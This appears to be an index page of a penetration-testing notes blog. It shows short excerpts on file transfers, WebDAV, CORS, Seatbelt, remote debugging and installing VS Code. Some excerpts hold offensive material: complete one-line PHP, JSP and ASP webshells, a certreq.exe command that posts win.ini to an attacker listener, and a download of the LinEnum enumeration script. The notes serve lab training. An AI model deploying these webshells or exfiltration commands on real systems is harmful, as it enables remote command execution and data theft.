SMB Uploads We can run SMB over HTTP with WebDav. WebDAV is an extension of HTTP, the WebDAV protocol enables a webserver to behave like a fileserver, supporting collaborative content authoring. W...

Python 2 - Download Shuciran@htb[/htb]$ python2.7 -c 'import urllib;urllib.urlretrieve ("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh")' Python 3 - Downloa...

Upload win.ini to our Pwnbox This will send the file to our Netcat session, and we can copy-paste its contents. C:\htb> certreq.exe -Post -config http://192.168.49.128/ c:\windows\win.ini Fil...

Same-Origin Policy and CORS There are three key concepts to understand CORS: Origins and the Same-Origin Policy (SOP) Cross-Origin Resource Sharing (CORS) Sending Requests Between Origins ...

SEATBELT Seatbelt is a C# project that performs a number of security oriented host-survey “safety checks” relevant from both offensive and defensive security perspectives. You can download from he...

Base64 Upload/Download In some cases, we may not be able to transfer the file. For example, the remote host may have firewall protections that prevent us from downloading a file from our machine. ...

PHP WEBSHELL <?php system($_REQUEST["cmd"]); ?> JSP WEBSHELL <% Runtime.getRuntime().exec(request.getParameter("cmd")); %> ASP WEBSHELL <% eval request("cmd") %>

String Example: $app->post('upload-avatar', function (Request $request, Response $response, array $args) use ($container) { Useful for Notepad++ Keeps only the string $app->post('upload-a...

Remote Debugging Remote debugging allows us to debug a process running on a different system as long as we have access to the source code and the debugger port on the remote system. Let’s try...

Installation OPTION #1 The easiest way to install Visual Studio Code for Debian/Ubuntu based distributions is to download and install the .deb package (64-bit), either through the graphical softwa...